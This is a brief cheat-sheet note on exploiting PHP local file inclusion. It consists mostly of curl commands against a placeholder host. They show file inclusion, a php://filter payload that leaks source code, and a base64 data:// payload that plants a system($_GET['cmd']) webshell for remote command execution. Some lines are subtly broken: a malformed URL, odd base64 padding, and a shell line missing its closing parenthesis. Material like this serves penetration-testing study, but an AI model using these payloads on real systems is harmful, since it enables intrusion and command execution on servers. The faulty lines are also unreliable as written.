Imagine a PHP file where you can perform LFI such as
curl http://example.com/vuln.php?lang=en.php
With a badly configured server and app you can use PHP read filters to get the full content
curl http://example.com/vuln.php?lang=php://filter/read=convert.base64-encode/resource=en.php
You can get a webshell or RCE if allow_url_include is enabled
curl http://example.com?vuln.php?lang=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Cg==%3D%3D&cmd=whoami
The shell is <?php system($_GET['cmd'];